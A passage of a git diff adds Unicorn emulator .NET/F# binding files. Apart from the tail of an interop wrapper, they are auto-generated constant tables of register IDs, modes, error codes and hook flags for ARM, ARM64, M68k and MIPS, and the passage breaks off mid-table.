thi.EmuStart(eng, beginAddr, untilAddr, timeout, count) = uc_emu_start(eng, beginAddr, untilAddr, timeout, count) + member thi.EmuStop(eng) = uc_emu_stop(eng) + member this.HookDel(eng, hook) = uc_hook_del(eng, hook) + member thi.ArchSupported(arch) = uc_arch_supported(arch) + member thi.Errono(eng) = uc_errno(eng) + member thi.Strerror(err) = uc_strerror(err) + member this.MemMapPtr(eng, address, size, perms, ptr) = uc_mem_map_ptr(eng, address, size, perms, ptr) + member this.MemUnmap(eng, address, size) = uc_mem_unmap(eng, address, size) + member this.MemProtect(eng, address, size, perms) = uc_mem_protect(eng, address, size, perms) + member thi.HookAddNoarg(eng, hh, callbackType, callback, userData, hookBegin, hookEnd) = uc_hook_add_noarg(eng, hh, callbackType, callback, userData, hookBegin, hookEnd) + member thi.HookAddArg0(eng, hh, callbackType, callback, userData, hookBegin, hookEnd, arg0) = uc_hook_add_arg0(eng, hh, callbackType, callback, userData, hookBegin, hookEnd, arg0) + member thi.HookAddArg0Arg1(eng, hh, callbackType, callback, userData, hookBegin, hookEnd, arg0, arg1) = uc_hook_add_arg0_arg1(eng, hh, callbackType, callback, userData, hookBegin, hookEnd, arg0, arg1) + } \ No newline at end of file diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Const/Arm.fs b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Const/Arm.fs new file mode 100644 index 0000000..1751fc8 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Const/Arm.fs @@ -0,0 +1,140 @@ +// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT + +namespace UnicornManaged.Const + +open System + +[] +module Arm = + + // ARM registers + + let UC_ARM_REG_INVALID = 0 + let UC_ARM_REG_APSR = 1 + let UC_ARM_REG_APSR_NZCV = 2 + let UC_ARM_REG_CPSR = 3 + let UC_ARM_REG_FPEXC = 4 + let UC_ARM_REG_FPINST = 5 + let UC_ARM_REG_FPSCR = 6 + let UC_ARM_REG_FPSCR_NZCV = 7 + let UC_ARM_REG_FPSID = 8 + let UC_ARM_REG_ITSTATE = 9 + let UC_ARM_REG_LR = 10 + let UC_ARM_REG_PC = 11 + let UC_ARM_REG_SP = 12 + let UC_ARM_REG_SPSR = 13 + let UC_ARM_REG_D0 = 14 + let UC_ARM_REG_D1 = 15 + let UC_ARM_REG_D2 = 16 + let UC_ARM_REG_D3 = 17 + let UC_ARM_REG_D4 = 18 + let UC_ARM_REG_D5 = 19 + let UC_ARM_REG_D6 = 20 + let UC_ARM_REG_D7 = 21 + let UC_ARM_REG_D8 = 22 + let UC_ARM_REG_D9 = 23 + let UC_ARM_REG_D10 = 24 + let UC_ARM_REG_D11 = 25 + let UC_ARM_REG_D12 = 26 + let UC_ARM_REG_D13 = 27 + let UC_ARM_REG_D14 = 28 + let UC_ARM_REG_D15 = 29 + let UC_ARM_REG_D16 = 30 + let UC_ARM_REG_D17 = 31 + let UC_ARM_REG_D18 = 32 + let UC_ARM_REG_D19 = 33 + let UC_ARM_REG_D20 = 34 + let UC_ARM_REG_D21 = 35 + let UC_ARM_REG_D22 = 36 + let UC_ARM_REG_D23 = 37 + let UC_ARM_REG_D24 = 38 + let UC_ARM_REG_D25 = 39 + let UC_ARM_REG_D26 = 40 + let UC_ARM_REG_D27 = 41 + let UC_ARM_REG_D28 = 42 + let UC_ARM_REG_D29 = 43 + let UC_ARM_REG_D30 = 44 + let UC_ARM_REG_D31 = 45 + let UC_ARM_REG_FPINST2 = 46 + let UC_ARM_REG_MVFR0 = 47 + let UC_ARM_REG_MVFR1 = 48 + let UC_ARM_REG_MVFR2 = 49 + let UC_ARM_REG_Q0 = 50 + let UC_ARM_REG_Q1 = 51 + let UC_ARM_REG_Q2 = 52 + let UC_ARM_REG_Q3 = 53 + let UC_ARM_REG_Q4 = 54 + let UC_ARM_REG_Q5 = 55 + let UC_ARM_REG_Q6 = 56 + let UC_ARM_REG_Q7 = 57 + let UC_ARM_REG_Q8 = 58 + let UC_ARM_REG_Q9 = 59 + let UC_ARM_REG_Q10 = 60 + let UC_ARM_REG_Q11 = 61 + let UC_ARM_REG_Q12 = 62 + let UC_ARM_REG_Q13 = 63 + let UC_ARM_REG_Q14 = 64 + let UC_ARM_REG_Q15 = 65 + let UC_ARM_REG_R0 = 66 + let UC_ARM_REG_R1 = 67 + let UC_ARM_REG_R2 = 68 + let UC_ARM_REG_R3 = 69 + let UC_ARM_REG_R4 = 70 + let UC_ARM_REG_R5 = 71 + let UC_ARM_REG_R6 = 72 + let UC_ARM_REG_R7 = 73 + let UC_ARM_REG_R8 = 74 + let UC_ARM_REG_R9 = 75 + let UC_ARM_REG_R10 = 76 + let UC_ARM_REG_R11 = 77 + let UC_ARM_REG_R12 = 78 + let UC_ARM_REG_S0 = 79 + let UC_ARM_REG_S1 = 80 + let UC_ARM_REG_S2 = 81 + let UC_ARM_REG_S3 = 82 + let UC_ARM_REG_S4 = 83 + let UC_ARM_REG_S5 = 84 + let UC_ARM_REG_S6 = 85 + let UC_ARM_REG_S7 = 86 + let UC_ARM_REG_S8 = 87 + let UC_ARM_REG_S9 = 88 + let UC_ARM_REG_S10 = 89 + let UC_ARM_REG_S11 = 90 + let UC_ARM_REG_S12 = 91 + let UC_ARM_REG_S13 = 92 + let UC_ARM_REG_S14 = 93 + let UC_ARM_REG_S15 = 94 + let UC_ARM_REG_S16 = 95 + let UC_ARM_REG_S17 = 96 + let UC_ARM_REG_S18 = 97 + let UC_ARM_REG_S19 = 98 + let UC_ARM_REG_S20 = 99 + let UC_ARM_REG_S21 = 100 + let UC_ARM_REG_S22 = 101 + let UC_ARM_REG_S23 = 102 + let UC_ARM_REG_S24 = 103 + let UC_ARM_REG_S25 = 104 + let UC_ARM_REG_S26 = 105 + let UC_ARM_REG_S27 = 106 + let UC_ARM_REG_S28 = 107 + let UC_ARM_REG_S29 = 108 + let UC_ARM_REG_S30 = 109 + let UC_ARM_REG_S31 = 110 + let UC_ARM_REG_C1_C0_2 = 111 + let UC_ARM_REG_C13_C0_2 = 112 + let UC_ARM_REG_C13_C0_3 = 113 + let UC_ARM_REG_IPSR = 114 + let UC_ARM_REG_MSP = 115 + let UC_ARM_REG_PSP = 116 + let UC_ARM_REG_CONTROL = 117 + let UC_ARM_REG_ENDING = 118 + + // alias registers + let UC_ARM_REG_R13 = 12 + let UC_ARM_REG_R14 = 10 + let UC_ARM_REG_R15 = 11 + let UC_ARM_REG_SB = 75 + let UC_ARM_REG_SL = 76 + let UC_ARM_REG_FP = 77 + let UC_ARM_REG_IP = 78 + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Const/Arm64.fs b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Const/Arm64.fs new file mode 100644 index 0000000..a2ec894 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Const/Arm64.fs @@ -0,0 +1,319 @@ +// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT + +namespace UnicornManaged.Const + +open System + +[] +module Arm64 = + + // ARM64 registers + + let UC_ARM64_REG_INVALID = 0 + let UC_ARM64_REG_X29 = 1 + let UC_ARM64_REG_X30 = 2 + let UC_ARM64_REG_NZCV = 3 + let UC_ARM64_REG_SP = 4 + let UC_ARM64_REG_WSP = 5 + let UC_ARM64_REG_WZR = 6 + let UC_ARM64_REG_XZR = 7 + let UC_ARM64_REG_B0 = 8 + let UC_ARM64_REG_B1 = 9 + let UC_ARM64_REG_B2 = 10 + let UC_ARM64_REG_B3 = 11 + let UC_ARM64_REG_B4 = 12 + let UC_ARM64_REG_B5 = 13 + let UC_ARM64_REG_B6 = 14 + let UC_ARM64_REG_B7 = 15 + let UC_ARM64_REG_B8 = 16 + let UC_ARM64_REG_B9 = 17 + let UC_ARM64_REG_B10 = 18 + let UC_ARM64_REG_B11 = 19 + let UC_ARM64_REG_B12 = 20 + let UC_ARM64_REG_B13 = 21 + let UC_ARM64_REG_B14 = 22 + let UC_ARM64_REG_B15 = 23 + let UC_ARM64_REG_B16 = 24 + let UC_ARM64_REG_B17 = 25 + let UC_ARM64_REG_B18 = 26 + let UC_ARM64_REG_B19 = 27 + let UC_ARM64_REG_B20 = 28 + let UC_ARM64_REG_B21 = 29 + let UC_ARM64_REG_B22 = 30 + let UC_ARM64_REG_B23 = 31 + let UC_ARM64_REG_B24 = 32 + let UC_ARM64_REG_B25 = 33 + let UC_ARM64_REG_B26 = 34 + let UC_ARM64_REG_B27 = 35 + let UC_ARM64_REG_B28 = 36 + let UC_ARM64_REG_B29 = 37 + let UC_ARM64_REG_B30 = 38 + let UC_ARM64_REG_B31 = 39 + let UC_ARM64_REG_D0 = 40 + let UC_ARM64_REG_D1 = 41 + let UC_ARM64_REG_D2 = 42 + let UC_ARM64_REG_D3 = 43 + let UC_ARM64_REG_D4 = 44 + let UC_ARM64_REG_D5 = 45 + let UC_ARM64_REG_D6 = 46 + let UC_ARM64_REG_D7 = 47 + let UC_ARM64_REG_D8 = 48 + let UC_ARM64_REG_D9 = 49 + let UC_ARM64_REG_D10 = 50 + let UC_ARM64_REG_D11 = 51 + let UC_ARM64_REG_D12 = 52 + let UC_ARM64_REG_D13 = 53 + let UC_ARM64_REG_D14 = 54 + let UC_ARM64_REG_D15 = 55 + let UC_ARM64_REG_D16 = 56 + let UC_ARM64_REG_D17 = 57 + let UC_ARM64_REG_D18 = 58 + let UC_ARM64_REG_D19 = 59 + let UC_ARM64_REG_D20 = 60 + let UC_ARM64_REG_D21 = 61 + let UC_ARM64_REG_D22 = 62 + let UC_ARM64_REG_D23 = 63 + let UC_ARM64_REG_D24 = 64 + let UC_ARM64_REG_D25 = 65 + let UC_ARM64_REG_D26 = 66 + let UC_ARM64_REG_D27 = 67 + let UC_ARM64_REG_D28 = 68 + let UC_ARM64_REG_D29 = 69 + let UC_ARM64_REG_D30 = 70 + let UC_ARM64_REG_D31 = 71 + let UC_ARM64_REG_H0 = 72 + let UC_ARM64_REG_H1 = 73 + let UC_ARM64_REG_H2 = 74 + let UC_ARM64_REG_H3 = 75 + let UC_ARM64_REG_H4 = 76 + let UC_ARM64_REG_H5 = 77 + let UC_ARM64_REG_H6 = 78 + let UC_ARM64_REG_H7 = 79 + let UC_ARM64_REG_H8 = 80 + let UC_ARM64_REG_H9 = 81 + let UC_ARM64_REG_H10 = 82 + let UC_ARM64_REG_H11 = 83 + let UC_ARM64_REG_H12 = 84 + let UC_ARM64_REG_H13 = 85 + let UC_ARM64_REG_H14 = 86 + let UC_ARM64_REG_H15 = 87 + let UC_ARM64_REG_H16 = 88 + let UC_ARM64_REG_H17 = 89 + let UC_ARM64_REG_H18 = 90 + let UC_ARM64_REG_H19 = 91 + let UC_ARM64_REG_H20 = 92 + let UC_ARM64_REG_H21 = 93 + let UC_ARM64_REG_H22 = 94 + let UC_ARM64_REG_H23 = 95 + let UC_ARM64_REG_H24 = 96 + let UC_ARM64_REG_H25 = 97 + let UC_ARM64_REG_H26 = 98 + let UC_ARM64_REG_H27 = 99 + let UC_ARM64_REG_H28 = 100 + let UC_ARM64_REG_H29 = 101 + let UC_ARM64_REG_H30 = 102 + let UC_ARM64_REG_H31 = 103 + let UC_ARM64_REG_Q0 = 104 + let UC_ARM64_REG_Q1 = 105 + let UC_ARM64_REG_Q2 = 106 + let UC_ARM64_REG_Q3 = 107 + let UC_ARM64_REG_Q4 = 108 + let UC_ARM64_REG_Q5 = 109 + let UC_ARM64_REG_Q6 = 110 + let UC_ARM64_REG_Q7 = 111 + let UC_ARM64_REG_Q8 = 112 + let UC_ARM64_REG_Q9 = 113 + let UC_ARM64_REG_Q10 = 114 + let UC_ARM64_REG_Q11 = 115 + let UC_ARM64_REG_Q12 = 116 + let UC_ARM64_REG_Q13 = 117 + let UC_ARM64_REG_Q14 = 118 + let UC_ARM64_REG_Q15 = 119 + let UC_ARM64_REG_Q16 = 120 + let UC_ARM64_REG_Q17 = 121 + let UC_ARM64_REG_Q18 = 122 + let UC_ARM64_REG_Q19 = 123 + let UC_ARM64_REG_Q20 = 124 + let UC_ARM64_REG_Q21 = 125 + let UC_ARM64_REG_Q22 = 126 + let UC_ARM64_REG_Q23 = 127 + let UC_ARM64_REG_Q24 = 128 + let UC_ARM64_REG_Q25 = 129 + let UC_ARM64_REG_Q26 = 130 + let UC_ARM64_REG_Q27 = 131 + let UC_ARM64_REG_Q28 = 132 + let UC_ARM64_REG_Q29 = 133 + let UC_ARM64_REG_Q30 = 134 + let UC_ARM64_REG_Q31 = 135 + let UC_ARM64_REG_S0 = 136 + let UC_ARM64_REG_S1 = 137 + let UC_ARM64_REG_S2 = 138 + let UC_ARM64_REG_S3 = 139 + let UC_ARM64_REG_S4 = 140 + let UC_ARM64_REG_S5 = 141 + let UC_ARM64_REG_S6 = 142 + let UC_ARM64_REG_S7 = 143 + let UC_ARM64_REG_S8 = 144 + let UC_ARM64_REG_S9 = 145 + let UC_ARM64_REG_S10 = 146 + let UC_ARM64_REG_S11 = 147 + let UC_ARM64_REG_S12 = 148 + let UC_ARM64_REG_S13 = 149 + let UC_ARM64_REG_S14 = 150 + let UC_ARM64_REG_S15 = 151 + let UC_ARM64_REG_S16 = 152 + let UC_ARM64_REG_S17 = 153 + let UC_ARM64_REG_S18 = 154 + let UC_ARM64_REG_S19 = 155 + let UC_ARM64_REG_S20 = 156 + let UC_ARM64_REG_S21 = 157 + let UC_ARM64_REG_S22 = 158 + let UC_ARM64_REG_S23 = 159 + let UC_ARM64_REG_S24 = 160 + let UC_ARM64_REG_S25 = 161 + let UC_ARM64_REG_S26 = 162 + let UC_ARM64_REG_S27 = 163 + let UC_ARM64_REG_S28 = 164 + let UC_ARM64_REG_S29 = 165 + let UC_ARM64_REG_S30 = 166 + let UC_ARM64_REG_S31 = 167 + let UC_ARM64_REG_W0 = 168 + let UC_ARM64_REG_W1 = 169 + let UC_ARM64_REG_W2 = 170 + let UC_ARM64_REG_W3 = 171 + let UC_ARM64_REG_W4 = 172 + let UC_ARM64_REG_W5 = 173 + let UC_ARM64_REG_W6 = 174 + let UC_ARM64_REG_W7 = 175 + let UC_ARM64_REG_W8 = 176 + let UC_ARM64_REG_W9 = 177 + let UC_ARM64_REG_W10 = 178 + let UC_ARM64_REG_W11 = 179 + let UC_ARM64_REG_W12 = 180 + let UC_ARM64_REG_W13 = 181 + let UC_ARM64_REG_W14 = 182 + let UC_ARM64_REG_W15 = 183 + let UC_ARM64_REG_W16 = 184 + let UC_ARM64_REG_W17 = 185 + let UC_ARM64_REG_W18 = 186 + let UC_ARM64_REG_W19 = 187 + let UC_ARM64_REG_W20 = 188 + let UC_ARM64_REG_W21 = 189 + let UC_ARM64_REG_W22 = 190 + let UC_ARM64_REG_W23 = 191 + let UC_ARM64_REG_W24 = 192 + let UC_ARM64_REG_W25 = 193 + let UC_ARM64_REG_W26 = 194 + let UC_ARM64_REG_W27 = 195 + let UC_ARM64_REG_W28 = 196 + let UC_ARM64_REG_W29 = 197 + let UC_ARM64_REG_W30 = 198 + let UC_ARM64_REG_X0 = 199 + let UC_ARM64_REG_X1 = 200 + let UC_ARM64_REG_X2 = 201 + let UC_ARM64_REG_X3 = 202 + let UC_ARM64_REG_X4 = 203 + let UC_ARM64_REG_X5 = 204 + let UC_ARM64_REG_X6 = 205 + let UC_ARM64_REG_X7 = 206 + let UC_ARM64_REG_X8 = 207 + let UC_ARM64_REG_X9 = 208 + let UC_ARM64_REG_X10 = 209 + let UC_ARM64_REG_X11 = 210 + let UC_ARM64_REG_X12 = 211 + let UC_ARM64_REG_X13 = 212 + let UC_ARM64_REG_X14 = 213 + let UC_ARM64_REG_X15 = 214 + let UC_ARM64_REG_X16 = 215 + let UC_ARM64_REG_X17 = 216 + let UC_ARM64_REG_X18 = 217 + let UC_ARM64_REG_X19 = 218 + let UC_ARM64_REG_X20 = 219 + let UC_ARM64_REG_X21 = 220 + let UC_ARM64_REG_X22 = 221 + let UC_ARM64_REG_X23 = 222 + let UC_ARM64_REG_X24 = 223 + let UC_ARM64_REG_X25 = 224 + let UC_ARM64_REG_X26 = 225 + let UC_ARM64_REG_X27 = 226 + let UC_ARM64_REG_X28 = 227 + let UC_ARM64_REG_V0 = 228 + let UC_ARM64_REG_V1 = 229 + let UC_ARM64_REG_V2 = 230 + let UC_ARM64_REG_V3 = 231 + let UC_ARM64_REG_V4 = 232 + let UC_ARM64_REG_V5 = 233 + let UC_ARM64_REG_V6 = 234 + let UC_ARM64_REG_V7 = 235 + let UC_ARM64_REG_V8 = 236 + let UC_ARM64_REG_V9 = 237 + let UC_ARM64_REG_V10 = 238 + let UC_ARM64_REG_V11 = 239 + let UC_ARM64_REG_V12 = 240 + let UC_ARM64_REG_V13 = 241 + let UC_ARM64_REG_V14 = 242 + let UC_ARM64_REG_V15 = 243 + let UC_ARM64_REG_V16 = 244 + let UC_ARM64_REG_V17 = 245 + let UC_ARM64_REG_V18 = 246 + let UC_ARM64_REG_V19 = 247 + let UC_ARM64_REG_V20 = 248 + let UC_ARM64_REG_V21 = 249 + let UC_ARM64_REG_V22 = 250 + let UC_ARM64_REG_V23 = 251 + let UC_ARM64_REG_V24 = 252 + let UC_ARM64_REG_V25 = 253 + let UC_ARM64_REG_V26 = 254 + let UC_ARM64_REG_V27 = 255 + let UC_ARM64_REG_V28 = 256 + let UC_ARM64_REG_V29 = 257 + let UC_ARM64_REG_V30 = 258 + let UC_ARM64_REG_V31 = 259 + + // pseudo registers + let UC_ARM64_REG_PC = 260 + let UC_ARM64_REG_CPACR_EL1 = 261 + + // thread registers + let UC_ARM64_REG_TPIDR_EL0 = 262 + let UC_ARM64_REG_TPIDRRO_EL0 = 263 + let UC_ARM64_REG_TPIDR_EL1 = 264 + let UC_ARM64_REG_PSTATE = 265 + + // exception link registers + let UC_ARM64_REG_ELR_EL0 = 266 + let UC_ARM64_REG_ELR_EL1 = 267 + let UC_ARM64_REG_ELR_EL2 = 268 + let UC_ARM64_REG_ELR_EL3 = 269 + + // stack pointers registers + let UC_ARM64_REG_SP_EL0 = 270 + let UC_ARM64_REG_SP_EL1 = 271 + let UC_ARM64_REG_SP_EL2 = 272 + let UC_ARM64_REG_SP_EL3 = 273 + + // other CP15 registers + let UC_ARM64_REG_TTBR0_EL1 = 274 + let UC_ARM64_REG_TTBR1_EL1 = 275 + let UC_ARM64_REG_ESR_EL0 = 276 + let UC_ARM64_REG_ESR_EL1 = 277 + let UC_ARM64_REG_ESR_EL2 = 278 + let UC_ARM64_REG_ESR_EL3 = 279 + let UC_ARM64_REG_FAR_EL0 = 280 + let UC_ARM64_REG_FAR_EL1 = 281 + let UC_ARM64_REG_FAR_EL2 = 282 + let UC_ARM64_REG_FAR_EL3 = 283 + let UC_ARM64_REG_PAR_EL1 = 284 + let UC_ARM64_REG_MAIR_EL1 = 285 + let UC_ARM64_REG_VBAR_EL0 = 286 + let UC_ARM64_REG_VBAR_EL1 = 287 + let UC_ARM64_REG_VBAR_EL2 = 288 + let UC_ARM64_REG_VBAR_EL3 = 289 + let UC_ARM64_REG_ENDING = 290 + + // alias registers + let UC_ARM64_REG_IP0 = 215 + let UC_ARM64_REG_IP1 = 216 + let UC_ARM64_REG_FP = 1 + let UC_ARM64_REG_LR = 2 + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Const/Common.fs b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Const/Common.fs new file mode 100644 index 0000000..c80ded8 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Const/Common.fs @@ -0,0 +1,116 @@ +// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT + +namespace UnicornManaged.Const + +open System + +[] +module Common = + let UC_API_MAJOR = 1 + + let UC_API_MINOR = 0 + let UC_VERSION_MAJOR = 1 + + let UC_VERSION_MINOR = 0 + let UC_VERSION_EXTRA = 2 + let UC_SECOND_SCALE = 1000000 + let UC_MILISECOND_SCALE = 1000 + let UC_ARCH_ARM = 1 + let UC_ARCH_ARM64 = 2 + let UC_ARCH_MIPS = 3 + let UC_ARCH_X86 = 4 + let UC_ARCH_PPC = 5 + let UC_ARCH_SPARC = 6 + let UC_ARCH_M68K = 7 + let UC_ARCH_MAX = 8 + + let UC_MODE_LITTLE_ENDIAN = 0 + let UC_MODE_BIG_ENDIAN = 1073741824 + + let UC_MODE_ARM = 0 + let UC_MODE_THUMB = 16 + let UC_MODE_MCLASS = 32 + let UC_MODE_V8 = 64 + let UC_MODE_ARM926 = 128 + let UC_MODE_ARM946 = 256 + let UC_MODE_ARM1176 = 512 + let UC_MODE_MICRO = 16 + let UC_MODE_MIPS3 = 32 + let UC_MODE_MIPS32R6 = 64 + let UC_MODE_MIPS32 = 4 + let UC_MODE_MIPS64 = 8 + let UC_MODE_16 = 2 + let UC_MODE_32 = 4 + let UC_MODE_64 = 8 + let UC_MODE_PPC32 = 4 + let UC_MODE_PPC64 = 8 + let UC_MODE_QPX = 16 + let UC_MODE_SPARC32 = 4 + let UC_MODE_SPARC64 = 8 + let UC_MODE_V9 = 16 + + let UC_ERR_OK = 0 + let UC_ERR_NOMEM = 1 + let UC_ERR_ARCH = 2 + let UC_ERR_HANDLE = 3 + let UC_ERR_MODE = 4 + let UC_ERR_VERSION = 5 + let UC_ERR_READ_UNMAPPED = 6 + let UC_ERR_WRITE_UNMAPPED = 7 + let UC_ERR_FETCH_UNMAPPED = 8 + let UC_ERR_HOOK = 9 + let UC_ERR_INSN_INVALID = 10 + let UC_ERR_MAP = 11 + let UC_ERR_WRITE_PROT = 12 + let UC_ERR_READ_PROT = 13 + let UC_ERR_FETCH_PROT = 14 + let UC_ERR_ARG = 15 + let UC_ERR_READ_UNALIGNED = 16 + let UC_ERR_WRITE_UNALIGNED = 17 + let UC_ERR_FETCH_UNALIGNED = 18 + let UC_ERR_HOOK_EXIST = 19 + let UC_ERR_RESOURCE = 20 + let UC_ERR_EXCEPTION = 21 + let UC_MEM_READ = 16 + let UC_MEM_WRITE = 17 + let UC_MEM_FETCH = 18 + let UC_MEM_READ_UNMAPPED = 19 + let UC_MEM_WRITE_UNMAPPED = 20 + let UC_MEM_FETCH_UNMAPPED = 21 + let UC_MEM_WRITE_PROT = 22 + let UC_MEM_READ_PROT = 23 + let UC_MEM_FETCH_PROT = 24 + let UC_MEM_READ_AFTER = 25 + let UC_HOOK_INTR = 1 + let UC_HOOK_INSN = 2 + let UC_HOOK_CODE = 4 + let UC_HOOK_BLOCK = 8 + let UC_HOOK_MEM_READ_UNMAPPED = 16 + let UC_HOOK_MEM_WRITE_UNMAPPED = 32 + let UC_HOOK_MEM_FETCH_UNMAPPED = 64 + let UC_HOOK_MEM_READ_PROT = 128 + let UC_HOOK_MEM_WRITE_PROT = 256 + let UC_HOOK_MEM_FETCH_PROT = 512 + let UC_HOOK_MEM_READ = 1024 + let UC_HOOK_MEM_WRITE = 2048 + let UC_HOOK_MEM_FETCH = 4096 + let UC_HOOK_MEM_READ_AFTER = 8192 + let UC_HOOK_INSN_INVALID = 16384 + let UC_HOOK_MEM_UNMAPPED = 112 + let UC_HOOK_MEM_PROT = 896 + let UC_HOOK_MEM_READ_INVALID = 144 + let UC_HOOK_MEM_WRITE_INVALID = 288 + let UC_HOOK_MEM_FETCH_INVALID = 576 + let UC_HOOK_MEM_INVALID = 1008 + let UC_HOOK_MEM_VALID = 7168 + let UC_QUERY_MODE = 1 + let UC_QUERY_PAGE_SIZE = 2 + let UC_QUERY_ARCH = 3 + let UC_QUERY_TIMEOUT = 4 + + let UC_PROT_NONE = 0 + let UC_PROT_READ = 1 + let UC_PROT_WRITE = 2 + let UC_PROT_EXEC = 4 + let UC_PROT_ALL = 7 + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Const/M68k.fs b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Const/M68k.fs new file mode 100644 index 0000000..8fc5157 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Const/M68k.fs @@ -0,0 +1,32 @@ +// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT + +namespace UnicornManaged.Const + +open System + +[] +module M68k = + + // M68K registers + + let UC_M68K_REG_INVALID = 0 + let UC_M68K_REG_A0 = 1 + let UC_M68K_REG_A1 = 2 + let UC_M68K_REG_A2 = 3 + let UC_M68K_REG_A3 = 4 + let UC_M68K_REG_A4 = 5 + let UC_M68K_REG_A5 = 6 + let UC_M68K_REG_A6 = 7 + let UC_M68K_REG_A7 = 8 + let UC_M68K_REG_D0 = 9 + let UC_M68K_REG_D1 = 10 + let UC_M68K_REG_D2 = 11 + let UC_M68K_REG_D3 = 12 + let UC_M68K_REG_D4 = 13 + let UC_M68K_REG_D5 = 14 + let UC_M68K_REG_D6 = 15 + let UC_M68K_REG_D7 = 16 + let UC_M68K_REG_SR = 17 + let UC_M68K_REG_PC = 18 + let UC_M68K_REG_ENDING = 19 + diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Const/Mips.fs b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Const/Mips.fs new file mode 100644 index 0000000..2428202 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/dotnet/UnicornManaged/Const/Mips.fs @@ -0,0 +1,205 @@ +// For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT + +namespace UnicornManaged.Const + +open System + +[] +module Mips = + + // MIPS registers + + let UC_MIPS_REG_INVALID = 0 + + // General purpose registers + let UC_MIPS_REG_PC = 1 + let UC_MIPS_REG_0 = 2 + let UC_MIPS_REG_1 = 3 + let UC_MIPS_REG_2 = 4 + let UC_MIPS_REG_3 = 5 + let UC_MIPS_REG_4 = 6 + let UC_MIPS_REG_5 = 7 + let UC_MIPS_REG_6 = 8 + let UC_MIPS_REG_7 = 9 + let UC_MIPS_REG_8 = 10 + let UC_MIPS_REG_9 = 11 + let UC_MIPS_REG_10 = 12 + let UC_MIPS_REG_11 = 13 + let UC_MIPS_REG_12 = 14 + let UC_MIPS_REG_13 = 15 + let UC_MIPS_REG_14 = 16 + let UC_MIPS_REG_15 = 17 + let UC_MIPS_REG_16 = 18 + let UC_MIPS_REG_17 = 19 + let UC_MIPS_REG_18 = 20 + let UC_MIPS_REG_19 = 21 + let UC_MIPS_REG_20 = 22 + let UC_MIPS_REG_21 = 23 + let UC_MIPS_REG_22 = 24 + let UC_MIPS_REG_23 = 25 + let UC_MIPS_REG_24 = 26 + let UC_MIPS_REG_25 = 27 + let UC_MIPS_REG_26 = 28 + let UC_MIPS_REG_27 = 29 + let UC_MIPS_REG_28 = 30 + let UC_MIPS_REG_29 = 31 + let UC_MIPS_REG_30 = 32 + let UC_MIPS_REG_31 = 33 + + // DSP registers + let UC_MIPS_REG_DSPCCOND = 34 + let UC_MIPS_REG_DSPCARRY = 35 + let UC_MIPS_REG_DSPEFI = 36 + let UC_MIPS_REG_DSPOUTFLAG = 37 + let UC_MIPS_REG_DSPOUTFLAG16_19 = 38 + let UC_MIPS_REG_DSPOUTFLAG20 = 39 + let UC_MIPS_REG_DSPOUTFLAG21 = 40 + let UC_MIPS_REG_DSPOUTFLAG22 = 41 + let UC_MIPS_REG_DSPOUTFLAG23 = 42 + let UC_MIPS_REG_DSPPOS = 43 + let UC_MIPS_REG_DSPSCOUNT = 44 + + // ACC registers + let UC_MIPS_REG_AC0 = 45 + let UC_MIPS_REG_AC1 = 46 + let UC_MIPS_REG_AC2 = 47 + let UC_MIPS_REG_AC3 = 48 + + // COP registers + let UC_MIPS_REG_CC0 = 49 + let UC_MIPS_REG_CC1 = 50 + let UC_MIPS_REG_CC2 = 51 + let UC_MIPS_REG_CC3 = 52 + let UC_MIPS_REG_CC4 = 53 + let UC_MIPS_REG_CC5 = 54 + let UC_MIPS_REG_CC6 = 55 + let UC_MIPS_REG_CC7 = 56 + + // FPU registers + let UC_MIPS_REG_F0 = 57 + let UC_MIPS_REG_F1 = 58 + let UC_MIPS_REG_F2 = 59 + let UC_MIPS_REG_F3 = 60 + let UC_MIPS_REG_F4 = 61 + let UC_MIPS_REG_F5 = 62 + let UC_MIPS_REG_F6 = 63 + let UC_MIPS_REG_F7 = 64 + let UC_MIPS_REG_F8 = 65 + let UC_MIPS_REG_F9 = 66 + let UC_MIPS_REG_F10 = 67 + let UC_MIPS_REG_F11 = 68 + let UC_MIPS_REG_F12 = 69 + let UC_MIPS_REG_F13 = 70 + let UC_MIPS_REG_F14 = 71 + let UC_MIPS_REG_F15 = 72 + let UC_MIPS_REG_F16 = 73 + let UC_MIPS_REG_F17 = 74 + let UC_MIPS_REG_F18 = 75 + let UC_MIPS_REG_F19 = 76 + let UC_MIPS_REG_F20 = 77 + let UC_MIPS_REG_F21 = 78 + let UC_MIPS_REG_F22 = 79 + let UC_MIPS_REG_F23 = 80 + let UC_MIPS_REG_F24 = 81 + let UC_MIPS_REG_F25 = 82 + let UC_MIPS_REG_F26 = 83 + let UC_MIPS_REG_F27 = 84 + let UC_MIPS_REG_F28 = 85 + let UC_MIPS_REG_F29 = 86 + let UC_MIPS_REG_F30 = 87 + let UC_MIPS_REG_F31 = 88 + let UC_MIPS_REG_FCC0 = 89 + let UC_MIPS_REG_FCC1 = 90 + let UC_MIPS_REG_FCC2 = 91 + let UC_MIPS_REG_FCC3 = 92 + let UC_MIPS_REG_FCC4 = 93 + let UC_MIPS_REG_FCC5 = 94 + let UC_MIPS_REG_FCC6 = 95 + let 